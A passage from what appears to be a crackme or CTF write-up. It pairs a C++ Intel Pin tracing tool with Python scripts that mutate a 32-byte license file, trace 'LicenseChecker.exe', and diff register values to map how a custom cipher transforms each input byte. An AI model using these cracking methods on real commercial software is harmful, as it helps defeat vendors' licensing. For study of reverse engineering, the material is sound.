    PIN_ReleaseLock(&g_lock);
}

// Instruction-level instrumentation. The call site gets enter/exit hooks
// (the call target is read from RSI); every instruction gets the guarded
// ShouldLog -> LogRegs pair.
static VOID Instruction(INS ins, VOID* /*v*/) {
    const bool is_callsite = (g_callsite != 0) && (INS_Address(ins) == g_callsite);
    if (is_callsite) {
        INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode,
                       IARG_THREAD_ID,
                       IARG_REG_VALUE, REG_RSI,
                       IARG_INST_PTR,
                       IARG_END);
        if (INS_IsValidForIpointAfter(ins)) {
            INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)ExitShellcode,
                           IARG_THREAD_ID,
                           IARG_END);
        }
    }

    INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldLog,
                     IARG_THREAD_ID,
                     IARG_INST_PTR,
                     IARG_END);
    INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)LogRegs,
                       IARG_THREAD_ID,
                       IARG_REG_VALUE, REG_RAX,
                       IARG_REG_VALUE, REG_RCX,
                       IARG_END);
}

// Application-exit callback: closes the log file if it was opened.
static VOID Fini(INT32 /*code*/, VOID* /*v*/) {
    if (g_fp == nullptr) {
        return;
    }
    std::fclose(g_fp);
}

// Tool entry point: initialises Pin, opens the log, registers all callbacks
// and hands control to the application. Returns 1 when Pin initialisation
// fails and 2 when the log file cannot be opened.
int main(int argc, char* argv[]) {
    PIN_InitSymbols();
    if (PIN_Init(argc, argv)) {
        return 1;
    }

    g_tls = PIN_CreateThreadDataKey(nullptr);
    PIN_InitLock(&g_lock);

    const std::string out_path = KnobOut.Value();
    g_fp = std::fopen(out_path.c_str(), "wb");
    if (g_fp == nullptr) {
        return 2;
    }

    std::fprintf(g_fp, "===== MatryTrace start =====\n");
    std::fprintf(g_fp, "out=%s, call_rva=0x%llX\n", out_path.c_str(), (unsigned long long)KnobCallRva.Value());
    std::fflush(g_fp);

    IMG_AddInstrumentFunction(ImageLoad, nullptr);
    INS_AddInstrumentFunction(Instruction, nullptr);
    PIN_AddThreadStartFunction(ThreadStart, nullptr);
    PIN_AddThreadFiniFunction(ThreadFini, nullptr);
    PIN_AddFiniFunction(Fini, nullptr);

    PIN_StartProgram();  // hands control to the application
    return 0;
}

From the output log we can see that two int64 constants, 0xEFB1957A03BAECF7 and 0x8C982983781BCDB6, appear continuously throughout the entire log. Every int64 of the input is turned into a new int64 by the processing; call these results Res0~Res3. At the end, after Res3 has been generated, Res0 appears again and one final int64 is produced, whose value is Res0 >> 1. Next, modify each byte of the license in turn and observe how the results change:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
import re
from dataclasses import dataclass
from collections import Counter
from typing import Optional, Tuple, Dict, List

RX = re.compile(r'^(rax|rcx)\s*=\s*0x([0-9a-fA-F]+)\s*$')

@dataclass
class Entry:
    """One register value parsed from a trace log."""

    # Register value decoded from the hexadecimal text.
    value: int
    # 1-based number of the log line the value was found on.
    lineno: int

def parse_log_values(path: str, min_digits: int = 15) -> List[Entry]:
    """Collect the "wide" rax/rcx values recorded in a trace log.

    Only lines of the form ``rax = 0x...`` / ``rcx = 0x...`` are considered,
    and a value is kept only when its hex text has at least ``min_digits``
    digits. Each kept value is returned with its 1-based line number, in
    file order.
    """
    out: List[Entry] = []
    with open(path, "r", encoding="utf-8", errors="ignore") as f:
        for i, line in enumerate(f, 1):
            m = RX.match(line.strip())
            if not m:
                continue
            hexstr = m.group(2)
            if len(hexstr) < min_digits:
                continue
            out.append(Entry(int(hexstr, 16), i))
    return out

def qwords_from_32bytes(buf32: bytes) -> List[int]:
    """Split a 32-byte buffer into four little-endian 64-bit integers."""
    assert len(buf32) == 32
    return [int.from_bytes(buf32[i:i + 8], "little") for i in range(0, 32, 8)]

def first_occurrence_map(entries: List[Entry]) -> Dict[int, int]:
    """Map each distinct value to the line number of its first occurrence."""
    first: Dict[int, int] = {}
    for e in entries:
        # setdefault keeps the line number of the earliest entry.
        first.setdefault(e.value, e.lineno)
    return first

def diff_byte_positions_le(a: int, b: int) -> List[int]:
    """Return the little-endian byte indices (0..7) at which two qwords differ."""
    ba = a.to_bytes(8, "little", signed=False)
    bb = b.to_bytes(8, "little", signed=False)
    return [i for i, (x, y) in enumerate(zip(ba, bb)) if x != y]

def format_bytes_le(x: int) -> str:
    """Format a qword as eight space-separated hex bytes, lowest byte first."""
    b = x.to_bytes(8, "little", signed=False)
    return " ".join(f"{v:02x}" for v in b)

def set_only(entriesA, entriesB):
    """Return (values only in A, values only in B) as two sets.

    Both arguments are iterables of objects exposing a ``value`` attribute.
    """
    setA = {e.value for e in entriesA}
    setB = {e.value for e in entriesB}
    return setA - setB, setB - setA

def pick_earliest_from_set(only_set, first_line, forbid_values, forbid_keys):
    """Pick the candidate value that appears earliest in its log.

    A value is skipped when its low 32 bits are zero, when it is listed in
    ``forbid_values``, or when ``forbid_keys`` is non-empty and contains it.
    ``first_line`` maps value -> first line number; values missing from it
    are never selected.

    Returns ``(value, line_number)`` or ``None`` when nothing qualifies.
    """
    best_v = None
    best_ln = 10**18  # sentinel larger than any real line number
    for v in only_set:
        if (v & 0xffffffff) == 0:
            continue
        if v in forbid_values:
            continue
        if forbid_keys and v in forbid_keys:
            continue
        ln = first_line.get(v, 10**18)
        if ln < best_ln:
            best_ln = ln
            best_v = v
    if best_v is None:
        return None
    return (best_v, best_ln)

def find_round_diff_value_set_based(logA: str, logB: str, inputA_32: bytes, inputB_32: bytes, min_digits: int = 15, forbid_keys: Optional[set] = None):
    """Find, for two trace logs, the earliest value unique to each log.

    Values that equal a plaintext qword of either 32-byte input, or that are
    listed in ``forbid_keys``, are excluded (see pick_earliest_from_set).

    Returns ``(candA, candB)``; each is ``(value, line_number)`` or ``None``.
    """
    # ``Optional[set]`` is used instead of ``set[int] | None`` because the
    # latter is evaluated at definition time and fails before Python 3.10.
    A = parse_log_values(logA, min_digits=min_digits)
    B = parse_log_values(logB, min_digits=min_digits)
    onlyA, onlyB = set_only(A, B)
    firstA = first_occurrence_map(A)
    firstB = first_occurrence_map(B)
    forbid_values = set(qwords_from_32bytes(inputA_32)) | set(qwords_from_32bytes(inputB_32))

    candA = pick_earliest_from_set(onlyA, firstA, forbid_values, forbid_keys)
    candB = pick_earliest_from_set(onlyB, firstB, forbid_values, forbid_keys)
    return candA, candB

import os
import subprocess
from pathlib import Path
from typing import Tuple, Optional
from pick_round_diff import find_round_diff_value_set_based, diff_byte_positions_le, format_bytes_le

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
TARGET_EXE= r"LicenseChecker.exe"
CALL_RVA = "0x120B"

BASE_STR = b"12345678901234567890123456789012"
assert len(BASE_STR) == 32

WORKDIR = Path(".").resolve()
LICENSE_PATH = WORKDIR / "license.bin"
LOG_BASE = WORKDIR / "log_base.txt"
LOG_CUR = WORKDIR / "log.txt"
OUT_MAP = WORKDIR / "map_result.txt"

def run_pin_and_collect(log_path: Path) -> None:
    """Run the target under Pin with the trace tool and require a log file.

    Any stale log at ``log_path`` is removed first. A non-zero exit code is
    only reported (with captured stdout/stderr); the run counts as failed
    only when no non-empty log was produced.

    Raises:
        RuntimeError: if ``log_path`` is missing or empty after the run.
    """
    if log_path.exists():
        log_path.unlink()
    cmd = [PIN_EXE, "-t", str((WORKDIR / TOOL_DLL).resolve()), "-o", str(log_path), "-call_rva", CALL_RVA, "--", str((WORKDIR / TARGET_EXE).resolve())]
    r = subprocess.run(cmd, cwd=str(WORKDIR), stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    if r.returncode != 0:
        print("[!] pin run returncode =", r.returncode)
        if r.stdout.strip():
            print("=== stdout ===\n", r.stdout)
        if r.stderr.strip():
            print("=== stderr ===\n", r.stderr)
    if not log_path.exists() or log_path.stat().st_size == 0:
        raise RuntimeError(f"log not generated: {log_path}")

def write_license(buf32: bytes) -> None:
    """Write exactly 32 bytes to LICENSE_PATH, replacing any existing file."""
    assert len(buf32) == 32
    LICENSE_PATH.write_bytes(buf32)

def mutate_one_byte(base: bytes, pos: int) -> bytes:
    """Return a copy of ``base`` with the byte at ``pos`` incremented by one.

    The increment wraps modulo 256, so 0xFF becomes 0x00.
    """
    b = bytearray(base)
    b[pos] = (b[pos] + 1) & 0xFF
    return bytes(b)

def ensure_baseline() -> None:
    """Create the baseline trace for BASE_STR unless a non-empty one exists."""
    if LOG_BASE.exists() and LOG_BASE.stat().st_size > 0:
        return
    print("[*] generating baseline log_base.txt ...")
    write_license(BASE_STR)
    run_pin_and_collect(LOG_BASE)

FORBID_KEYS = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}

def analyze_pair(base32: bytes, cur32: bytes) -> Tuple[Optional[int], Optional[int], list[int]]:
    """Compare the baseline log with the current log.

    Returns ``(valA, valB, changed)`` where ``valA``/``valB`` are the earliest
    values unique to the baseline/current log and ``changed`` lists the
    little-endian byte indices at which they differ. Returns
    ``(None, None, [])`` when either log yields no candidate.
    """
    candA, candB = find_round_diff_value_set_based(
        str(LOG_BASE), str(LOG_CUR),
        inputA_32=base32,
        inputB_32=cur32,
        min_digits=15,
        forbid_keys=FORBID_KEYS,
    )
    if candA is None or candB is None:
        return None, None, []
    # Only the values are needed here; the line numbers are ignored.
    valA, _ = candA
    valB, _ = candB
    changed = diff_byte_positions_le(valA, valB)
    return valA, valB, changed

def main():
    """Mutate each of the 32 license bytes in turn and record which bytes of
    the first differing qword change, writing one line per position to
    OUT_MAP."""
    ensure_baseline()

    lines = []
    lines.append("Base = " + BASE_STR.decode("ascii", "ignore"))
    lines.append("Rule: pick unique (multiset extra), low32!=0, not plaintext qwords; if multiple, earliest line.\n")
    lines.append("Output: block_idx byte_idx (within block) => changed bytes in round-diff qword (little-endian idx 0..7)\n")

    for block in range(4):
        for off in range(8):
            pos = block * 8 + off
            cur = mutate_one_byte(BASE_STR, pos)
            write_license(cur)
            run_pin_and_collect(LOG_CUR)
            valA, valB, changed = analyze_pair(BASE_STR, cur)
            orig_ch = BASE_STR[pos]
            new_ch = cur[pos]
            if valA is None or valB is None:
                lines.append(f"[block{block} byte{off} pos{pos:02d}] {orig_ch:02x}->{new_ch:02x} !! no candidate found")
                continue
            lines.append(
                f"[block{block} byte{off} pos{pos:02d}] {orig_ch:02x}->{new_ch:02x} "
                f"diff_qword: A=0x{valA:016x} (le:{format_bytes_le(valA)}) "
                f"B=0x{valB:016x} (le:{format_bytes_le(valB)}) "
                f"changed_le_idx={changed}")

    OUT_MAP.write_text("\n".join(lines), encoding="utf-8")
    print("[+] wrote:", OUT_MAP)


if __name__ == "__main__":
    main()

The output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
[block0 byte0 pos00] 31->32 A=0x56f01199de97c803 B=0x50f01199de98cb33 changed_le_idx=[0, 1, 2, 7]
[block0 byte1 pos01] 32->33 A=0x56f01199de97c803 B=0x56f0119bdb96d803 changed_le_idx=[1, 2, 3, 4]
[block0 byte2 pos02] 33->34 A=0x56f01199de97c803 B=0x56f01f99d9e7c818 changed_le_idx=[0, 2, 3, 5]
[block0 byte3 pos03] 34->35 A=0x56f01199de97c803 B=0x56f21199ce97cd02 changed_le_idx=[0, 1, 3, 6]
[block0 byte4 pos04] 35->36 A=0x56f01199de97c803 B=0x56ff12aad897c803 changed_le_idx=[3, 4, 5, 6]
[block0 byte5 pos05] 36->37 A=0x56f01199de97c803 B=0x53f10099de97c801 changed_le_idx=[0, 5, 6, 7]
[block0 byte6 pos06] 37->38 A=0x56f01199de97c803 B=0x590f11aade97d603 changed_le_idx=[1, 4, 6, 7]
[block0 byte7 pos07] 38->39 A=0x56f01199de97c803 B=0x47f01498de95c803 changed_le_idx=[2, 4, 5, 7]

[block1 byte0 pos08] 39->3a A=0xa0c207ffba81fa8b B=0xa6c207ffba8ef9bb changed_le_idx=[0, 1, 2, 7]
[block1 byte1 pos09] 30->31 A=0xa0c207ffba81fa8b B=0xa0c207fdbf80ea8b changed_le_idx=[1, 2, 3, 4]
[block1 byte2 pos10] 31->32 A=0xa0c207ffba81fa8b B=0xa0c201ffb9b1fa84 changed_le_idx=[0, 2, 3, 5]
[block1 byte3 pos11] 32->33 A=0xa0c207ffba81fa8b B=0xa0c007ffaa81ff8a changed_le_idx=[0, 1, 3, 6]
[block1 byte4 pos12] 33->34 A=0xa0c207ffba81fa8b B=0xa0d90088b481fa8b changed_le_idx=[3, 4, 5, 6]
[block1 byte5 pos13] 34->35 A=0xa0c207ffba81fa8b B=0xa5c316ffba81fa89 changed_le_idx=[0, 5, 6, 7]
[block1 byte6 pos14] 35->36 A=0xa0c207ffba81fa8b B=0xa3f107f0ba81fc8b changed_le_idx=[1, 4, 6, 7]
[block1 byte7 pos15] 36->37 A=0xa0c207ffba81fa8b B=0xb1c202feba83fa8b changed_le_idx=[2, 4, 5, 7]

[block2 byte0 pos16] 37->38 A=0x86ac79d1be3b724d B=0x98ac79d1be087dbd changed_le_idx=[0, 1, 2, 7]
[block2 byte1 pos17] 38->39 A=0x86ac79d1be3b724d B=0x86ac79d3bb3a624d changed_le_idx=[1, 2, 3, 4]
[block2 byte2 pos18] 39->3a A=0x86ac79d1be3b724d B=0x86ac7fd1bd0b7242 changed_le_idx=[0, 2, 3, 5]
[block2 byte3 pos19] 30->31 A=0x86ac79d1be3b724d B=0x86ae79d1ae3b774c changed_le_idx=[0, 1, 3, 6]
[block2 byte4 pos20] 31->32 A=0x86ac79d1be3b724d B=0x86a37ae2b83b724d changed_le_idx=[3, 4, 5, 6]
[block2 byte5 pos21] 32->33 A=0x86ac79d1be3b724d B=0x83ad68d1be3b724f changed_le_idx=[0, 5, 6, 7]
[block2 byte6 pos22] 33->34 A=0x86ac79d1be3b724d B=0x81db79cabe3b7c4d changed_le_idx=[1, 4, 6, 7]
[block2 byte7 pos23] 34->35 A=0x86ac79d1be3b724d B=0x97ac7cd0be39724d changed_le_idx=[2, 4, 5, 7]

[block3 byte0 pos24] 35->36 A=0xecb4514916d3bc57 B=0xeab4514916dcbf67 changed_le_idx=[0, 1, 2, 7]
[block3 byte1 pos25] 36->37 A=0xecb4514916d3bc57 B=0xecb4514b13d2ac57 changed_le_idx=[1, 2, 3, 4]
[block3 byte2 pos26] 37->38 A=0xecb4514916d3bc57 B=0xecb44f491923bc64 changed_le_idx=[0, 2, 3, 5]
[block3 byte3 pos27] 38->39 A=0xecb4514916d3bc57 B=0xecb6514906d3b956 changed_le_idx=[0, 1, 3, 6]
[block3 byte4 pos28] 39->3a A=0xecb4514916d3bc57 B=0xecbb527a10d3bc57 changed_le_idx=[3, 4, 5, 6]
[block3 byte5 pos29] 30->31 A=0xecb4514916d3bc57 B=0xe9b5404916d3bc55 changed_le_idx=[0, 5, 6, 7]
[block3 byte6 pos30] 31->32 A=0xecb4514916d3bc57 B=0xef87514616d3ba57 changed_le_idx=[1, 4, 6, 7]
[block3 byte7 pos31] 32->33 A=0xecb4514916d3bc57 B=0xfdb4544816d1bc57 changed_le_idx=[2, 4, 5, 7]

This shows that the round function is the same for every qword, and that each input byte contributes to exactly 4 bytes of the cipher.

Next, feed four identical int64 blocks: the output shows that all four results are indeed identical. Note that when input[0] is 01*8, Res0 is shifted right (shr) three times, whereas the other results are not shifted at all; this means the program compares the result bit by bit.

Next, try to find the pattern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
import os
import re
import subprocess
from pathlib import Path

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
APP_EXE = r"LicenseChecker.exe"
WORKDIR = os.getcwd()
LICENSE_BIN = os.path.join(WORKDIR, "license.bin")
LOG_PATH = os.path.join(WORKDIR, "log.txt")
OUT_PATH = os.path.join(WORKDIR, "findpatterns_idx.txt")

# 1-based index of the head byte to mutate (main() uses K - 1).
K = 1
# Largest delta added to the starting value 0x01 (main() caps it at 0xFE).
N = 0x10

# Input byte index -> little-endian output byte indices it was observed to
# change (taken from the per-byte mutation run).
INBYTE_TO_OUTIDX = {
0: [0, 1, 2, 7],
1: [1, 2, 3, 4],
2: [0, 2, 3, 5],
3: [0, 1, 3, 6],
4: [3, 4, 5, 6],
5: [0, 5, 6, 7],
6: [1, 4, 6, 7],
7: [2, 4, 5, 7],
}

# A logged rax/rcx value with 15 or 16 hex digits.
RE_REGQ = re.compile(r"\b(?:rax|rcx)\s*=\s*0x([0-9a-fA-F]{15,16})\b")
# A logged rax/rcx value of all ones, used as the stop marker.
RE_MARK = re.compile(r"\b(?:rax|rcx)\s*=\s*0xffffffffffffffff\b", re.I)
# The two constants that recur throughout the log; never picked as results.
KEY_BLACKLIST = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}

def write_license(k0: int, val: int):
    """Write a license of 8 x 0x01 followed by 24 x 0xFF, with byte ``k0``
    replaced by ``val``, to LICENSE_BIN and return the bytes written."""
    b = bytearray([0x01] * 8 + [0xFF] * 24)
    b[k0] = val
    with open(LICENSE_BIN, "wb") as f:
        f.write(b)
    return bytes(b)

def run_pin():
    """Run the target under Pin with the trace tool, discarding its output.

    The exit code is deliberately not checked; callers look at LOG_PATH.
    """
    cmd = [PIN_EXE, "-t", TOOL_DLL, "-o", LOG_PATH, "--", APP_EXE]
    subprocess.run(cmd, cwd=WORKDIR, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)

def le_bytes(qword: int):
    """Return the 8-byte little-endian encoding of an unsigned 64-bit value."""
    return qword.to_bytes(8, byteorder="little", signed=False)

def plaintext_qwords_from_license(lic: bytes):
    """Return the set of little-endian qwords formed by the first 32 bytes."""
    return {int.from_bytes(lic[off:off + 8], "little") for off in range(0, 32, 8)}

def is_candidate(v: int, plain_qwords: set):
    """Tell whether ``v`` may be a round result.

    Rejected: the blacklisted constants, the plaintext qwords of the license,
    and any value whose low 32 bits are all zero.
    """
    if v in KEY_BLACKLIST:
        return False
    if v in plain_qwords:
        return False
    if (v & 0xFFFFFFFF) == 0:
        return False
    return True

def extract_qword_from_log(log_path: str, plain_qwords: set):
    """Return the last candidate qword logged before the first stop marker.

    Scans the log top to bottom, remembering the most recent value accepted
    by is_candidate(). At the first marker line reached after a candidate
    has been seen, returns ``(value, line_index, line_text)``.

    Returns ``None`` when the log is missing or no such marker is found.
    """
    p = Path(log_path)
    if not p.exists():
        return None
    lines = p.read_text(errors="ignore").splitlines()
    last = None
    for i, line in enumerate(lines):
        m = RE_REGQ.search(line)
        if m:
            v = int(m.group(1), 16)
            if is_candidate(v, plain_qwords):
                last = (v, i, line)
        if RE_MARK.search(line):
            if last is not None:
                return last
    return None

def main():
    """Sweep one head byte of the license through 0x01..0x01+N and tabulate
    how the bytes it influences change relative to the 0x01 baseline.

    Raises:
        RuntimeError: if no result qword can be extracted for the baseline.
    """
    assert 1 <= K <= 8
    k0 = K - 1
    outidx = INBYTE_TO_OUTIDX[k0]
    base_lic = write_license(k0, 0x01)
    run_pin()
    base_plain = plaintext_qwords_from_license(base_lic)
    base = extract_qword_from_log(LOG_PATH, base_plain)
    if not base:
        raise RuntimeError("baseline log parse failed (no candidate before first FF-marker)")
    base_q, base_line, base_text = base
    base_le = le_bytes(base_q)
    with open(OUT_PATH, "w", encoding="utf-8") as f:
        f.write(f"Base license = 8*01 + 24*FF, mutate k={K} (0-based {k0}), outidx={outidx}\n")
        f.write(f"Baseline qword = 0x{base_q:016X} (line {base_line}) from: {base_text}\n")
        f.write(f"Baseline LE bytes = {' '.join(f'{b:02x}' for b in base_le)}\n")
        f.write("\n")
        f.write("val qword(HEX) picked_LE_bytes_at_outidx changed_outidx\n")
        f.write("-" * 90 + "\n")
        # val = 0x01 + delta stays within 0x01..0xFF, so it can never be 0x00.
        max_delta = min(N, 0xFE)
        for delta in range(0, max_delta + 1):
            val = 0x01 + delta
            lic = write_license(k0, val)
            run_pin()
            plain = plaintext_qwords_from_license(lic)
            got = extract_qword_from_log(LOG_PATH, plain)
            if not got:
                f.write(f"{val:02X} <parse failed>\n")
                continue
            q, ln, txt = got
            le = le_bytes(q)
            picked = [le[i] for i in outidx]
            base_picked = [base_le[i] for i in outidx]
            changed = [outidx[t] for t in range(len(outidx)) if picked[t] != base_picked[t]]
            f.write(
                f"{val:02X} 0x{q:016X} "
                f"{' '.join(f'{b:02x}' for b in picked)} "
                f"{changed}\n")
    print(f"[+] Wrote: {OUT_PATH}")


if __name__ == "__main__":
    main()

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
01  0x411CD85F280546A1   a1 46 05 41   []
02 0x471CD85F280A4591 91 45 0a 47 [0, 1, 2, 7]
03 0x451CD85F280F4481 81 44 0f 45 [0, 1, 2, 7]
04 0x4B1CD85F281443F1 f1 43 14 4b [0, 1, 2, 7]
05 0x491CD85F281142E1 e1 42 11 49 [0, 1, 2, 7]
06 0x4F1CD85F281E41D1 d1 41 1e 4f [0, 1, 2, 7]
07 0x4D1CD85F281B40C1 c1 40 1b 4d [0, 1, 2, 7]
08 0x531CD85F28284F31 31 4f 28 53 [0, 1, 2, 7]
09 0x511CD85F282D4E21 21 4e 2d 51 [0, 1, 2, 7]
0A 0x571CD85F28224D11 11 4d 22 57 [0, 1, 2, 7]
0B 0x551CD85F28274C01 01 4c 27 55 [0, 1, 2, 7]
0C 0x5B1CD85F283C4B71 71 4b 3c 5b [0, 1, 2, 7]
0D 0x591CD85F28394A61 61 4a 39 59 [0, 1, 2, 7]
0E 0x5F1CD85F28364951 51 49 36 5f [0, 1, 2, 7]
0F 0x5D1CD85F28334841 41 48 33 5d [0, 1, 2, 7]
10 0x631CD85F285056B1 b1 56 50 63 [0, 1, 2, 7]
11 0x611CD85F285557A1 a1 57 55 61 [1, 2, 7]

We can see strong linear patterns in the 4 affected cipher bytes. Flip one input bit at a time, XOR each result with the baseline to get the per-bit delta, and build the equations from those deltas:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import os
import re
import subprocess
from pathlib import Path

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
APP_EXE = r"LicenseChecker.exe"
WORKDIR = os.getcwd()
LICENSE_BIN = os.path.join(WORKDIR, "license.bin")
LOG_PATH = os.path.join(WORKDIR, "log.txt")
OUT_PATH = os.path.join(WORKDIR, "findpatterns_idx.txt")

# Baseline license layout: HEAD_LEN bytes of BASE_HEAD_BYTE followed by
# TAIL_LEN bytes of TAIL_BYTE.
BASE_HEAD_BYTE = 0x11
TAIL_BYTE = 0xFF
HEAD_LEN = 8
TAIL_LEN = 24
# Which occurrence of the all-ones marker to stop at (0 = the first one).
MARKER_N = 0
# When true, every run prints what was picked from the log.
DEBUG_EACH_RUN = True

# Input byte index -> little-endian output byte indices it was observed to
# change (taken from the per-byte mutation run).
INBYTE_TO_OUTIDX = {
0: [0, 1, 2, 7],
1: [1, 2, 3, 4],
2: [0, 2, 3, 5],
3: [0, 1, 3, 6],
4: [3, 4, 5, 6],
5: [0, 5, 6, 7],
6: [1, 4, 6, 7],
7: [2, 4, 5, 7],
}

# A logged rax/rcx value with 15 or 16 hex digits; group 1 is the register.
RE_REGQ = re.compile(r"\b(rax|rcx)\s*=\s*0x([0-9a-fA-F]{15,16})\b")
# The two constants that recur throughout the log; never picked as results.
KEY_BLACKLIST = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}
# Lower-case text of the all-ones marker value searched for in each line.
MARK_STR = "0xffffffffffffffff"

def run_pin():
    """Run the target under Pin with the trace tool, discarding its output.

    The exit code is deliberately not checked; callers look at LOG_PATH.
    """
    cmd = [PIN_EXE, "-t", TOOL_DLL, "-o", LOG_PATH, "--", APP_EXE]
    subprocess.run(cmd, cwd=WORKDIR, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)

def le_bytes(qword: int):
    """Return the 8-byte little-endian encoding of an unsigned 64-bit value."""
    encoded = qword.to_bytes(8, byteorder="little", signed=False)
    return encoded

def fmt_hex_bytes(bb: bytes):
    """Render each byte as two lower-case hex digits, separated by spaces."""
    parts = [format(byte, "02x") for byte in bb]
    return " ".join(parts)

def plaintext_qwords_from_license(lic: bytes):
    """Return the set of little-endian qwords formed by the first 32 bytes."""
    return {int.from_bytes(lic[off:off + 8], "little", signed=False) for off in range(0, 32, 8)}

def is_candidate(v: int, plain_qwords: set):
    """Tell whether ``v`` may be a round result.

    Rejected: the blacklisted constants, the plaintext qwords of the license,
    and any value whose low 32 bits are all zero.
    """
    if v in KEY_BLACKLIST:
        return False
    if v in plain_qwords:
        return False
    if (v & 0xFFFFFFFF) == 0:
        return False
    return True

def write_license_from_head(head8: bytes):
    """Write ``head8`` followed by TAIL_LEN x TAIL_BYTE to LICENSE_BIN.

    Returns the bytes written.

    Raises:
        ValueError: if the license would contain a 0x00 byte.
    """
    assert len(head8) == HEAD_LEN
    lic = bytearray(head8 + bytes([TAIL_BYTE]) * TAIL_LEN)
    if 0 in lic:
        raise ValueError("license contains 0x00 -> would be truncated by strlen")
    with open(LICENSE_BIN, "wb") as f:
        f.write(lic)
    return bytes(lic)

def extract_qword_from_log(log_path: str, plain_qwords: set, marker_n: int, dbg_tag: str = ""):
    """Return the last candidate qword logged before the ``marker_n``-th marker.

    Scans the log top to bottom, remembering the most recent value accepted
    by is_candidate(). When the ``marker_n``-th (0-based) line containing
    MARK_STR is reached, returns ``(last, marker_index, marker_text)`` where
    ``last`` is ``(value, line_index, register, line_text)`` or ``None`` if
    no candidate preceded the marker.

    Returns ``None`` when the log is missing or that marker never occurs.
    """
    p = Path(log_path)
    if not p.exists():
        return None
    lines = p.read_text(errors="ignore").splitlines()
    last = None
    marker_cnt = -1
    for i, line in enumerate(lines):
        m = RE_REGQ.search(line)
        if m:
            reg = m.group(1).lower()
            v = int(m.group(2), 16)
            if is_candidate(v, plain_qwords):
                last = (v, i, reg, line)
        if MARK_STR in line.lower():
            marker_cnt += 1
            if marker_cnt == marker_n:
                if DEBUG_EACH_RUN:
                    if last:
                        v, li, reg, ltxt = last
                        print(f"[dbg:{dbg_tag}] hit marker#{marker_cnt} at L{i}, pick L{li} {reg}=0x{v:016X}")
                    else:
                        print(f"[dbg:{dbg_tag}] hit marker#{marker_cnt} at L{i}, but no candidate before it")
                return (last, i, line)
    if DEBUG_EACH_RUN:
        print(f"[dbg:{dbg_tag}] no marker#{marker_n} found, markers_seen={marker_cnt+1}")
    return None

def main():
    """Flip every bit of every head byte once and record the XOR delta of the
    resulting qword against the baseline, writing the table to OUT_PATH.

    Raises:
        RuntimeError: if no result qword can be extracted for the baseline.
    """
    base_head = bytes([BASE_HEAD_BYTE] * HEAD_LEN)
    base_lic = write_license_from_head(base_head)
    run_pin()
    base_plain = plaintext_qwords_from_license(base_lic)
    base_ret = extract_qword_from_log(LOG_PATH, base_plain, MARKER_N, dbg_tag="base")
    if not base_ret or not base_ret[0]:
        raise RuntimeError("baseline log parse failed (no candidate before selected marker)")
    (base_pick, base_marker_line, base_marker_text) = base_ret
    base_q, base_line, base_reg, base_text = base_pick
    base_le = le_bytes(base_q)

    with open(OUT_PATH, "w", encoding="utf-8") as f:
        f.write(f"Base license: head=({fmt_hex_bytes(base_head)}), tail={TAIL_LEN}*FF\n")
        f.write(f"MARKER_N={MARKER_N} (0=first 0xFFFFFFFFFFFFFFFF)\n")
        f.write(f"Baseline marker line: {base_marker_line} text: {base_marker_text}\n")
        f.write(f"Baseline picked: {base_reg}=0x{base_q:016X} (line {base_line}) text: {base_text}\n")
        f.write(f"Baseline LE: {fmt_hex_bytes(base_le)}\n\n")
        for pos in range(HEAD_LEN):
            outidx = INBYTE_TO_OUTIDX[pos]
            f.write(f"=== byte pos {pos} outidx={outidx} ===\n")
            for bit in range(8):
                mut = bytearray(base_head)
                old = mut[pos]
                mut[pos] ^= (1 << bit)
                new = mut[pos]
                if new == 0:
                    # A 0x00 byte is rejected by write_license_from_head.
                    if DEBUG_EACH_RUN:
                        print(f"[dbg:pos{pos}bit{bit}] skip (would produce 0x00)")
                    f.write(f"pos{pos} bit{bit}: skip (0x00)\n")
                    continue
                lic = write_license_from_head(bytes(mut))
                run_pin()
                plain = plaintext_qwords_from_license(lic)
                tag = f"pos{pos}bit{bit} {old:02X}->{new:02X}"
